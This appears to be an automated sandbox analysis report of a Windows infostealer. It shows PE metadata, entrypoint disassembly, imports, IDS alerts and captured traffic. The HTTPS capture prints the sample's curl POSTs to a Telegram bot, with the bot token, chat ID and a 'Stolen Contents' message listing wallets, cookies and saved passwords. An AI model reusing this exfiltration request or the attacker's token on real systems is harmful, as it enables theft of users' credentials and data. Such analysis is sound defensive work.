                                                            Time Stamp:0x67CFF95D [Tue Mar 11 08:50:37 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:b10c9f38e47184aaa7cab7f4bb83709e

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F15FCBEF79Dh
                                                            jmp 00007F15FCBEEE69h
                                                            push ebp
                                                            mov ebp, esp
                                                            and dword ptr [00448620h], 00000000h
                                                            sub esp, 24h
                                                            or dword ptr [004470C4h], 01h
                                                            push 0000000Ah
                                                            call dword ptr [0043A0A0h]
                                                            test eax, eax
                                                            je 00007F15FCBEF1A2h
                                                            and dword ptr [ebp-10h], 00000000h
                                                            xor eax, eax
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            xor ecx, ecx
                                                            lea edi, dword ptr [ebp-24h]
                                                            push ebx
                                                            cpuid
                                                            mov esi, ebx
                                                            pop ebx
                                                            nop
                                                            mov dword ptr [edi], eax
                                                            mov dword ptr [edi+04h], esi
                                                            mov dword ptr [edi+08h], ecx
                                                            xor ecx, ecx
                                                            mov dword ptr [edi+0Ch], edx
                                                            mov eax, dword ptr [ebp-24h]
                                                            mov edi, dword ptr [ebp-20h]
                                                            mov dword ptr [ebp-0Ch], eax
                                                            xor edi, 756E6547h
                                                            mov eax, dword ptr [ebp-18h]
                                                            xor eax, 49656E69h
                                                            mov dword ptr [ebp-04h], eax
                                                            mov eax, dword ptr [ebp-1Ch]
                                                            xor eax, 6C65746Eh
                                                            mov dword ptr [ebp-08h], eax
                                                            xor eax, eax
                                                            inc eax
                                                            push ebx
                                                            cpuid
                                                            mov esi, ebx
                                                            pop ebx
                                                            nop
                                                            lea ebx, dword ptr [ebp-24h]
                                                            mov dword ptr [ebx], eax
                                                            mov eax, dword ptr [ebp-04h]
                                                            or eax, dword ptr [ebp-08h]
                                                            or eax, edi
                                                            mov dword ptr [ebx+04h], esi
                                                            mov dword ptr [ebx+08h], ecx
                                                            mov dword ptr [ebx+0Ch], edx
                                                            jne 00007F15FCBEF035h
                                                            mov eax, dword ptr [ebp-24h]
                                                            and eax, 0FFF3FF0h
                                                            cmp eax, 000106C0h
                                                            je 00007F15FCBEF015h
                                                            cmp eax, 00020660h
                                                            je 00007F15FCBEF00Eh
                                                            cmp eax, 00020670h
                                                            je 00007F15FCBEF007h
                                                            cmp eax, 00030650h
                                                            je 00007F15FCBEF000h
                                                            cmp eax, 00030660h
                                                            je 00007F15FCBEEFF9h
                                                            cmp eax, 00030670h

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x45d780x50.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x1e0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x2650.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x427300x70.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x426700x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x3a0000x194.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x387a40x38800d91741c6310ac212d5fd5e72ee2e0c78False0.5208578194137168data6.57298549546635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x3a0000xc6a00xc800733fe21a7179482d9d565fc0d83dabceFalse0.431015625data4.966999938216593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x470000x21600x14008bc01682a84ebcb3e42c3638270ee7a4False0.19453125DOS executable (block device driver)3.322348124379405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x4a0000x1e00x200f1a34722f46fc93b4d50c6f08dc7679bFalse0.53125data4.7137725829467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x4b0000x26500x28005318f9ac373c0e8d7d1bd21f9ceeb910False0.70771484375data6.473938433272911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0x4a0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllGetModuleFileNameA, FindFirstFileA, GetModuleFileNameW, FindNextFileA, FindClose, WaitForSingleObject, CopyFileA, GetLastError, GetFileAttributesA, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, SetStdHandle, GetProcessHeap, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, GetCPInfo, GetStringTypeW, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, DuplicateHandle, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, DeleteFileW, HeapReAlloc, GetExitCodeProcess, CreatePipe, ReadFile, ReadConsoleW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetEndOfFile
                                                            USER32.dllShowWindow
                                                            SHELL32.dllSHGetFolderPathA

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-03-12T20:14:58.605223+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449723149.154.167.220443TCP
                                                            2025-03-12T20:15:02.180165+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449726149.154.167.220443TCP
                                                            2025-03-12T20:15:04.974956+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449731149.154.167.220443TCP
                                                            2025-03-12T20:15:08.056433+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449735149.154.167.220443TCP
                                                            2025-03-12T20:15:21.605870+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449742149.154.167.220443TCP
                                                            2025-03-12T20:15:24.769160+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449745149.154.167.220443TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 12, 2025 20:14:56.740597963 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:56.740631104 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:56.740689993 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:56.751899958 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:56.751914978 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:58.594981909 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:58.595078945 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:58.599195957 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:58.599208117 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:58.599457026 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:58.605104923 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:58.652323008 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:59.550828934 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:59.555150032 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:59.555279970 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:59.563355923 CET49723443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:59.563370943 CET44349723149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:59.655925035 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:59.656014919 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:14:59.656092882 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:59.661787987 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:14:59.661818027 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.176151037 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.176248074 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:02.177469015 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:02.177504063 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.177752972 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.180068016 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:02.220351934 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.859184027 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.859256983 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:02.859311104 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:02.865005970 CET49726443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:02.865046978 CET44349726149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:03.060672998 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:03.060718060 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:03.064770937 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:03.073868990 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:03.073890924 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:04.970217943 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:04.970431089 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:04.971807003 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:04.971837997 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:04.972064018 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:04.974857092 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:05.016356945 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:05.674063921 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:05.674350977 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:05.674422979 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:05.682245970 CET49731443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:05.682285070 CET44349731149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:05.851207972 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:05.851311922 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:05.851402998 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:05.863468885 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:05.863504887 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.050352097 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.050436974 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:08.051959991 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:08.051983118 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.052200079 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.056345940 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:08.100366116 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.917799950 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.917860985 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:08.917956114 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:08.924248934 CET49735443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:08.924295902 CET44349735149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:19.606987953 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:19.607028008 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:19.607100964 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:19.613931894 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:19.613960981 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:21.601393938 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:21.601488113 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:21.602997065 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:21.603010893 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:21.603223085 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:21.605609894 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:21.605823994 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:21.605829954 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:22.569185019 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:22.569255114 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:22.569375038 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:22.575925112 CET49742443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:22.575984955 CET44349742149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:22.682800055 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:22.682883978 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:22.682997942 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:22.689801931 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:22.689836979 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:24.764269114 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:24.764374018 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:24.766154051 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:24.766184092 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:24.766412020 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:24.768886089 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:24.769095898 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:24.769108057 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:25.415539980 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:25.415623903 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:25.415687084 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:25.421722889 CET49745443192.168.2.4149.154.167.220
                                                            Mar 12, 2025 20:15:25.421766043 CET44349745149.154.167.220192.168.2.4
                                                            Mar 12, 2025 20:15:41.155946970 CET6070753192.168.2.4162.159.36.2
                                                            Mar 12, 2025 20:15:41.160723925 CET5360707162.159.36.2192.168.2.4
                                                            Mar 12, 2025 20:15:41.163114071 CET6070753192.168.2.4162.159.36.2
                                                            Mar 12, 2025 20:15:41.163177013 CET6070753192.168.2.4162.159.36.2
                                                            Mar 12, 2025 20:15:41.167869091 CET5360707162.159.36.2192.168.2.4
                                                            Mar 12, 2025 20:15:41.635490894 CET5360707162.159.36.2192.168.2.4
                                                            Mar 12, 2025 20:15:41.636152029 CET6070753192.168.2.4162.159.36.2
                                                            Mar 12, 2025 20:15:41.641165972 CET5360707162.159.36.2192.168.2.4
                                                            Mar 12, 2025 20:15:41.641227961 CET6070753192.168.2.4162.159.36.2

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 12, 2025 20:14:56.548433065 CET5093353192.168.2.41.1.1.1
                                                            Mar 12, 2025 20:14:56.556047916 CET53509331.1.1.1192.168.2.4
                                                            Mar 12, 2025 20:14:56.558608055 CET5093453192.168.2.4208.67.222.222
                                                            Mar 12, 2025 20:14:56.565583944 CET5350934208.67.222.222192.168.2.4
                                                            Mar 12, 2025 20:14:56.567537069 CET5093553192.168.2.4208.67.222.222
                                                            Mar 12, 2025 20:14:56.574563980 CET5350935208.67.222.222192.168.2.4
                                                            Mar 12, 2025 20:14:56.578062057 CET5093653192.168.2.4208.67.222.222
                                                            Mar 12, 2025 20:14:56.584965944 CET5350936208.67.222.222192.168.2.4
                                                            Mar 12, 2025 20:14:56.728264093 CET4967653192.168.2.41.1.1.1
                                                            Mar 12, 2025 20:14:56.736502886 CET53496761.1.1.1192.168.2.4
                                                            Mar 12, 2025 20:15:02.968705893 CET4967753192.168.2.4208.67.222.222
                                                            Mar 12, 2025 20:15:02.975476980 CET5349677208.67.222.222192.168.2.4
                                                            Mar 12, 2025 20:15:02.977395058 CET4967853192.168.2.4208.67.222.222
                                                            Mar 12, 2025 20:15:02.984086990 CET5349678208.67.222.222192.168.2.4
                                                            Mar 12, 2025 20:15:02.988343000 CET4967953192.168.2.4208.67.222.222
                                                            Mar 12, 2025 20:15:02.994926929 CET5349679208.67.222.222192.168.2.4
                                                            Mar 12, 2025 20:15:19.597353935 CET6412653192.168.2.41.1.1.1
                                                            Mar 12, 2025 20:15:19.604445934 CET53641261.1.1.1192.168.2.4
                                                            Mar 12, 2025 20:15:41.154907942 CET5352682162.159.36.2192.168.2.4
                                                            Mar 12, 2025 20:15:41.660420895 CET53524621.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Mar 12, 2025 20:14:56.548433065 CET192.168.2.41.1.1.10x4472Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.558608055 CET192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.567537069 CET192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.578062057 CET192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.728264093 CET192.168.2.41.1.1.10xf838Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.968705893 CET192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.977395058 CET192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.988343000 CET192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)false
                                                            Mar 12, 2025 20:15:19.597353935 CET192.168.2.41.1.1.10x78bdStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Mar 12, 2025 20:14:56.556047916 CET1.1.1.1192.168.2.40x4472No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.565583944 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.565583944 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.565583944 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.565583944 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.574563980 CET208.67.222.222192.168.2.40x2No error (0)myip.opendns.com54.38.153.202A (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:14:56.736502886 CET1.1.1.1192.168.2.40xf838No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.975476980 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.975476980 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.975476980 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.975476980 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Mar 12, 2025 20:15:02.984086990 CET208.67.222.222192.168.2.40x2No error (0)myip.opendns.com54.38.153.202A (IP address)IN (0x0001)false
                                                            Mar 12, 2025 20:15:19.604445934 CET1.1.1.1192.168.2.40x78bdNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.telegram.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449723149.154.167.2204437864C:\Windows\SysWOW64\curl.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-12 19:14:58 UTC195OUTPOST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 399
                                                            2025-03-12 19:14:58 UTC399OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 20 22 2d 34 37 39 38 38 33 34 33 30 35 22 2c 20 22 70 61 72 73 65 5f 6d 6f 64 65 22 3a 20 22 48 54 4d 4c 22 2c 20 22 74 65 78 74 22 3a 20 22 f0 9f 92 80 20 53 74 6f 6c 65 6e 20 43 6f 6e 74 65 6e 74 73 20 f0 9f 92 80 5c 6e 5c 6e f0 9f 93 8d 20 49 50 3a 20 41 64 64 72 65 73 73 3a 20 20 32 30 38 2e 36 37 2e 32 32 32 2e 32 32 32 5c 6e 41 64 64 72 65 73 73 3a 20 20 35 34 2e 33 38 2e 31 35 33 2e 32 30 32 5c 6e 5c 6e f0 9f 93 82 20 57 61 6c 6c 65 74 20 45 78 74 65 6e 73 69 6f 6e 73 20 28 30 29 5c 6e 5c 6e f0 9f 93 82 20 53 6f 66 74 77 61 72 65 20 57 61 6c 6c 65 74 73 20 28 30 29 5c 6e 5c 6e f0 9f 94 90 20 43 6f 6f 6b 69 65 73 20 26 20 53 61 76 65 64 20 50 61 73 73 77 6f 72 64 73 20 28 30 29 5c 6e e2 94 94 e2 94 80 e2 94 80 20 4e
                                                            Data Ascii: {"chat_id": "-4798834305", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n N
                                                            2025-03-12 19:14:59 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:14:59 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 823
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:14:59 UTC823INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 30 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 39 34 36 34 36 36 33 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 61 6b 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 42 6f 74 20 5c 75 64 38 33 65 5c 75 64 65 39 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 46 61 6b 65 43 6c 6f 75 64 66 6c 61 72 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 39 38 38 33 34 33 30 35 2c 22 74 69 74 6c 65 22 3a 22 63 6c 6f 75 64 66 6c 61 72 65 20 6c 6f 67 73 20 61 6c 6c 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61
                                                            Data Ascii: {"ok":true,"result":{"message_id":15091,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449726149.154.167.2204437940C:\Windows\SysWOW64\curl.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-12 19:15:02 UTC195OUTPOST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 399
                                                            2025-03-12 19:15:02 UTC399OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 20 22 2d 34 37 39 38 38 33 34 33 30 35 22 2c 20 22 70 61 72 73 65 5f 6d 6f 64 65 22 3a 20 22 48 54 4d 4c 22 2c 20 22 74 65 78 74 22 3a 20 22 f0 9f 92 80 20 53 74 6f 6c 65 6e 20 43 6f 6e 74 65 6e 74 73 20 f0 9f 92 80 5c 6e 5c 6e f0 9f 93 8d 20 49 50 3a 20 41 64 64 72 65 73 73 3a 20 20 32 30 38 2e 36 37 2e 32 32 32 2e 32 32 32 5c 6e 41 64 64 72 65 73 73 3a 20 20 35 34 2e 33 38 2e 31 35 33 2e 32 30 32 5c 6e 5c 6e f0 9f 93 82 20 57 61 6c 6c 65 74 20 45 78 74 65 6e 73 69 6f 6e 73 20 28 30 29 5c 6e 5c 6e f0 9f 93 82 20 53 6f 66 74 77 61 72 65 20 57 61 6c 6c 65 74 73 20 28 30 29 5c 6e 5c 6e f0 9f 94 90 20 43 6f 6f 6b 69 65 73 20 26 20 53 61 76 65 64 20 50 61 73 73 77 6f 72 64 73 20 28 30 29 5c 6e e2 94 94 e2 94 80 e2 94 80 20 4e
